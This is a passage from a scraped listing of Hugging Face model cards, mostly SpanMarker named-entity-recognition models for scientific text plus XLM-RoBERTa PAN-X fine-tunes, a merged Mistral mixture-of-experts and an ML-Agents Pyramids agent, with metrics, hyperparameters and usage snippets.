- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "Depth time - series", "defect", "an overall mitochondrial" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "an approximation", "EFSA", "in vitro" |
| Process | "intake", "a significant reduction of synthesis", "translation" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.7108 | 0.6715 | 0.6906 |
| Data | 0.6591 | 0.6138 | 0.6356 |
| Material | 0.795 | 0.7910 | 0.7930 |
| Method | 0.5 | 0.45 | 0.4737 |
| Process | 0.6898 | 0.6293 | 0.6582 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter2_base-me")
# Run inference
entities = model.predict("We established a P fertilizer need map based on integrating results from the two systems .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter2_base-me")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/specter2_base-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
zhang19991111/specter-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:19:42Z | 6 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/specter",
"base_model:finetune:allenai/specter",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:18:27Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Altitude measurements based on near - IR imaging in H and Hcont filters showed
that the deeper BS2 clouds were located near the methane condensation level (
≈1.2bars ) , while BS1 was generally ∼500 mb above that level ( at lower pressures
) .
- text: However , our model predicts different performance for large enough memory
- access latency and validates the intuition that the dynamic programming algorithm
performs better on these machines .
- text: We established a P fertilizer need map based on integrating results from the
two systems .
- text: Here , we have addressed this limitation for the endodermal lineage by developing
a defined culture system to expand and differentiate human foregut stem cells
( hFSCs ) derived from hPSCs . hFSCs can self - renew while maintaining their
capacity to differentiate into pancreatic and hepatic cells .
- text: The accumulated percentage gain from selection amounted to 51%/1 % lower Striga
infestation ( measured by area under Striga number progress curve , ASNPC ) ,
46%/62 % lower downy mildew incidence , and 49%/31 % higher panicle yield of the
C5 - FS compared to the mean of the genepool parents at Sadoré / Cinzana , respectively
.
pipeline_tag: token-classification
base_model: allenai/specter
model-index:
- name: SpanMarker with allenai/specter on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.6710634789777411
name: F1
- type: precision
value: 0.6806020066889632
name: Precision
- type: recall
value: 0.6617886178861788
name: Recall
---
# SpanMarker with allenai/specter on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/specter](https://huggingface.co/allenai/specter) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/specter](https://huggingface.co/allenai/specter)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "an overall mitochondrial", "Depth time - series", "defect" |
| Material | "the subject 's fibroblasts", "COXI , COXII and COXIII subunits", "cross - shore measurement locations" |
| Method | "an approximation", "EFSA", "in vitro" |
| Process | "intake", "a significant reduction of synthesis", "translation" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.6806 | 0.6618 | 0.6711 |
| Data | 0.5939 | 0.6190 | 0.6062 |
| Material | 0.765 | 0.7612 | 0.7631 |
| Method | 0.4667 | 0.35 | 0.4 |
| Process | 0.6989 | 0.6341 | 0.6650 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter-me")
# Run inference
entities = model.predict("We established a P fertilizer need map based on integrating results from the two systems .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/specter-me")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/specter-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
zhang19991111/scibert-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:17:25Z | 6 | 1 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:allenai/scibert_scivocab_uncased",
"base_model:finetune:allenai/scibert_scivocab_uncased",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T02:15:55Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Inductively Coupled Plasma - Mass Spectrometry ( ICP - MS ) analysis of Longcliffe
SP52 limestone was undertaken to identify other impurities present , and the effect
of sorbent mass and SO2 concentration on elemental partitioning in the carbonator
between solid sorbent and gaseous phase was investigated , using a bubbler sampling
system .
- text: We extensively evaluate our work against benchmark and competitive protocols
across a range of metrics over three real connectivity and GPS traces such as
Sassy [ 44 ] , San Francisco Cabs [ 45 ] and Infocom 2006 [ 33 ] .
- text: In this research , we developed a robust two - layer classifier that can accurately
classify normal hearing ( NH ) from hearing impaired ( HI ) infants with congenital
sensori - neural hearing loss ( SNHL ) based on their Magnetic Resonance ( MR
) images .
- text: In situ Peak Force Tapping AFM was employed for determining morphology and
nano - mechanical properties of the surface layer .
- text: By means of a criterion of Gilmer for polynomially dense subsets of the ring
of integers of a number field , we show that , if h∈K[X ] maps every element of
OK of degree n to an algebraic integer , then h(X ) is integral - valued over
OK , that is , h(OK)⊂OK .
pipeline_tag: token-classification
base_model: allenai/scibert_scivocab_uncased
model-index:
- name: SpanMarker with allenai/scibert_scivocab_uncased on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.685430463576159
name: F1
- type: precision
value: 0.6981450252951096
name: Precision
- type: recall
value: 0.6731707317073171
name: Recall
---
# SpanMarker with allenai/scibert_scivocab_uncased on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [allenai/scibert_scivocab_uncased](https://huggingface.co/allenai/scibert_scivocab_uncased) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [allenai/scibert_scivocab_uncased](https://huggingface.co/allenai/scibert_scivocab_uncased)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "an overall mitochondrial", "defect", "Depth time - series" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "EFSA", "an approximation", "in vitro" |
| Process | "translation", "intake", "a significant reduction of synthesis" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.6981 | 0.6732 | 0.6854 |
| Data | 0.6269 | 0.6402 | 0.6335 |
| Material | 0.8085 | 0.7562 | 0.7815 |
| Method | 0.4211 | 0.4 | 0.4103 |
| Process | 0.6891 | 0.6488 | 0.6683 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/scibert_scivocab_uncased-me")
# Run inference
entities = model.predict("In situ Peak Force Tapping AFM was employed for determining morphology and nano - mechanical properties of the surface layer .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span-marker-allenai/scibert_scivocab_uncased-me")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span-marker-allenai/scibert_scivocab_uncased-me-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training Results
| Epoch | Step | Validation Loss | Validation Precision | Validation Recall | Validation F1 | Validation Accuracy |
|:------:|:----:|:---------------:|:--------------------:|:-----------------:|:-------------:|:-------------------:|
| 2.0134 | 300 | 0.0476 | 0.7297 | 0.5821 | 0.6476 | 0.7880 |
| 4.0268 | 600 | 0.0532 | 0.7537 | 0.6775 | 0.7136 | 0.8281 |
| 6.0403 | 900 | 0.0655 | 0.7162 | 0.7080 | 0.7121 | 0.8357 |
| 8.0537 | 1200 | 0.0761 | 0.7143 | 0.7061 | 0.7102 | 0.8251 |
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
lsh231/xlm-roberta-base-finetuned-panx-en | lsh231 | 2024-01-22T02:09:15Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"dataset:xtreme",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-01-22T02:07:48Z | ---
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
datasets:
- xtreme
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-panx-en
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: xtreme
type: xtreme
config: PAN-X.en
split: validation
args: PAN-X.en
metrics:
- name: F1
type: f1
value: 0.686617730095991
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-panx-en
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on the xtreme dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4024
- F1: 0.6866
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 24
- eval_batch_size: 24
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 1.1536 | 1.0 | 50 | 0.6294 | 0.5349 |
| 0.5343 | 2.0 | 100 | 0.4330 | 0.6401 |
| 0.3617 | 3.0 | 150 | 0.4024 | 0.6866 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
lsh231/xlm-roberta-base-finetuned-panx-fr | lsh231 | 2024-01-22T02:05:51Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"dataset:xtreme",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-01-22T02:02:33Z | ---
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
datasets:
- xtreme
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-panx-fr
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: xtreme
type: xtreme
config: PAN-X.fr
split: validation
args: PAN-X.fr
metrics:
- name: F1
type: f1
value: 0.8426190876956741
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-panx-fr
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on the xtreme dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2810
- F1: 0.8426
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 24
- eval_batch_size: 24
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 0.5826 | 1.0 | 191 | 0.3593 | 0.7699 |
| 0.2659 | 2.0 | 382 | 0.2919 | 0.8270 |
| 0.1801 | 3.0 | 573 | 0.2810 | 0.8426 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
Crystalcareai/Evolorxa-13B | Crystalcareai | 2024-01-22T02:02:55Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"Open-Orca/Mistral-7B-OpenOrca",
"Crystalcareai/Evol-Mistral",
"conversational",
"base_model:Crystalcareai/Evol-Mistral",
"base_model:merge:Crystalcareai/Evol-Mistral",
"base_model:Open-Orca/Mistral-7B-OpenOrca",
"base_model:merge:Open-Orca/Mistral-7B-OpenOrca",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T01:55:22Z | ---
license: mit
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
- Open-Orca/Mistral-7B-OpenOrca
- Crystalcareai/Evol-Mistral
base_model:
- Open-Orca/Mistral-7B-OpenOrca
- Crystalcareai/Evol-Mistral
---
# Evolorxa-14b
Evolorxa-14b is a Mixure of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [Open-Orca/Mistral-7B-OpenOrca](https://huggingface.co/Open-Orca/Mistral-7B-OpenOrca)
* [Crystalcareai/Evol-Mistral](https://huggingface.co/Crystalcareai/Evol-Mistral)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: Open-Orca/Mistral-7B-OpenOrca
layer_range: [0, 32]
- model: Crystalcareai/Evol-Mistral
layer_range: [0, 32]
merge_method: slerp
base_model: Open-Orca/Mistral-7B-OpenOrca
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
experts:
- source_model: Open-Orca/Mistral-7B-OpenOrca
positive_prompts:
- "chat"
- "reasoning"
- "Why would"
- "explain"
- source_model: Crystalcareai/Evol-Mistral
positive_prompts:
- "instruction"
- "create a"
- "You must"
- "Your job"
```
## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "Crystalcareai/Evolorxa-14b"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
zhang19991111/roberta-large-spanmarker-STEM-NER | zhang19991111 | 2024-01-22T02:00:00Z | 4 | 0 | span-marker | [
"span-marker",
"safetensors",
"token-classification",
"ner",
"named-entity-recognition",
"generated_from_span_marker_trainer",
"en",
"base_model:FacebookAI/roberta-large",
"base_model:finetune:FacebookAI/roberta-large",
"license:cc-by-sa-4.0",
"model-index",
"region:us"
] | token-classification | 2024-01-22T01:52:38Z | ---
language: en
license: cc-by-sa-4.0
library_name: span-marker
tags:
- span-marker
- token-classification
- ner
- named-entity-recognition
- generated_from_span_marker_trainer
metrics:
- precision
- recall
- f1
widget:
- text: Inductively Coupled Plasma - Mass Spectrometry ( ICP - MS ) analysis of Longcliffe
SP52 limestone was undertaken to identify other impurities present , and the effect
of sorbent mass and SO2 concentration on elemental partitioning in the carbonator
between solid sorbent and gaseous phase was investigated , using a bubbler sampling
system .
- text: We extensively evaluate our work against benchmark and competitive protocols
across a range of metrics over three real connectivity and GPS traces such as
Sassy [ 44 ] , San Francisco Cabs [ 45 ] and Infocom 2006 [ 33 ] .
- text: In this research , we developed a robust two - layer classifier that can accurately
classify normal hearing ( NH ) from hearing impaired ( HI ) infants with congenital
sensori - neural hearing loss ( SNHL ) based on their Magnetic Resonance ( MR
) images .
- text: In situ Peak Force Tapping AFM was employed for determining morphology and
nano - mechanical properties of the surface layer .
- text: By means of a criterion of Gilmer for polynomially dense subsets of the ring
of integers of a number field , we show that , if h∈K[X ] maps every element of
OK of degree n to an algebraic integer , then h(X ) is integral - valued over
OK , that is , h(OK)⊂OK .
pipeline_tag: token-classification
base_model: roberta-large
model-index:
- name: SpanMarker with roberta-large on my-data
results:
- task:
type: token-classification
name: Named Entity Recognition
dataset:
name: my-data
type: unknown
split: test
metrics:
- type: f1
value: 0.7147595356550579
name: F1
- type: precision
value: 0.7292724196277496
name: Precision
- type: recall
value: 0.7008130081300813
name: Recall
---
# SpanMarker with roberta-large on my-data
This is a [SpanMarker](https://github.com/tomaarsen/SpanMarkerNER) model that can be used for Named Entity Recognition. This SpanMarker model uses [roberta-large](https://huggingface.co/roberta-large) as the underlying encoder.
## Model Details
### Model Description
- **Model Type:** SpanMarker
- **Encoder:** [roberta-large](https://huggingface.co/roberta-large)
- **Maximum Sequence Length:** 256 tokens
- **Maximum Entity Length:** 8 words
<!-- - **Training Dataset:** [Unknown](https://huggingface.co/datasets/unknown) -->
- **Language:** en
- **License:** cc-by-sa-4.0
### Model Sources
- **Repository:** [SpanMarker on GitHub](https://github.com/tomaarsen/SpanMarkerNER)
- **Thesis:** [SpanMarker For Named Entity Recognition](https://raw.githubusercontent.com/tomaarsen/SpanMarkerNER/main/thesis.pdf)
### Model Labels
| Label | Examples |
|:---------|:--------------------------------------------------------------------------------------------------------|
| Data | "Depth time - series", "an overall mitochondrial", "defect" |
| Material | "cross - shore measurement locations", "the subject 's fibroblasts", "COXI , COXII and COXIII subunits" |
| Method | "an approximation", "in vitro", "EFSA" |
| Process | "intake", "translation", "a significant reduction of synthesis" |
## Evaluation
### Metrics
| Label | Precision | Recall | F1 |
|:---------|:----------|:-------|:-------|
| **all** | 0.7293 | 0.7008 | 0.7148 |
| Data | 0.6583 | 0.6931 | 0.6753 |
| Material | 0.8141 | 0.8060 | 0.8100 |
| Method | 0.5556 | 0.5 | 0.5263 |
| Process | 0.7314 | 0.6244 | 0.6737 |
## Uses
### Direct Use for Inference
```python
from span_marker import SpanMarkerModel
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span_marker_model_id")
# Run inference
entities = model.predict("In situ Peak Force Tapping AFM was employed for determining morphology and nano - mechanical properties of the surface layer .")
```
### Downstream Use
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
```python
from span_marker import SpanMarkerModel, Trainer
# Download from the 🤗 Hub
model = SpanMarkerModel.from_pretrained("span_marker_model_id")
# Specify a Dataset with "tokens" and "ner_tag" columns
dataset = load_dataset("conll2003") # For example CoNLL2003
# Initialize a Trainer using the pretrained model & dataset
trainer = Trainer(
model=model,
train_dataset=dataset["train"],
eval_dataset=dataset["validation"],
)
trainer.train()
trainer.save_model("span_marker_model_id-finetuned")
```
</details>
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Set Metrics
| Training set | Min | Median | Max |
|:----------------------|:----|:--------|:----|
| Sentence length | 3 | 25.6049 | 106 |
| Entities per sentence | 0 | 5.2439 | 22 |
### Training Hyperparameters
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training Results
| Epoch | Step | Validation Loss | Validation Precision | Validation Recall | Validation F1 | Validation Accuracy |
|:------:|:----:|:---------------:|:--------------------:|:-----------------:|:-------------:|:-------------------:|
| 2.0134 | 300 | 0.0544 | 0.6819 | 0.6260 | 0.6527 | 0.8016 |
| 4.0268 | 600 | 0.0525 | 0.7217 | 0.7176 | 0.7196 | 0.8387 |
| 6.0403 | 900 | 0.0688 | 0.7652 | 0.7214 | 0.7426 | 0.8459 |
| 8.0537 | 1200 | 0.0703 | 0.7636 | 0.7214 | 0.7419 | 0.8349 |
### Framework Versions
- Python: 3.10.12
- SpanMarker: 1.5.0
- Transformers: 4.36.2
- PyTorch: 2.0.1+cu118
- Datasets: 2.16.1
- Tokenizers: 0.15.0
## Citation
### BibTeX
```
@software{Aarsen_SpanMarker,
author = {Aarsen, Tom},
license = {Apache-2.0},
title = {{SpanMarker for Named Entity Recognition}},
url = {https://github.com/tomaarsen/SpanMarkerNER}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
homerquan/ppo-PyramidsRND | homerquan | 2024-01-22T01:57:37Z | 1 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"Pyramids",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Pyramids",
"region:us"
] | reinforcement-learning | 2024-01-22T01:57:21Z | ---
library_name: ml-agents
tags:
- Pyramids
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Pyramids
---
# **ppo** Agent playing **Pyramids**
This is a trained model of a **ppo** agent playing **Pyramids**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: homerquan/ppo-PyramidsRND
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
ND911/EE-Silicon-Maid-7B | ND911 | 2024-01-22T01:53:41Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"SanjiWatsuki/Silicon-Maid-7B",
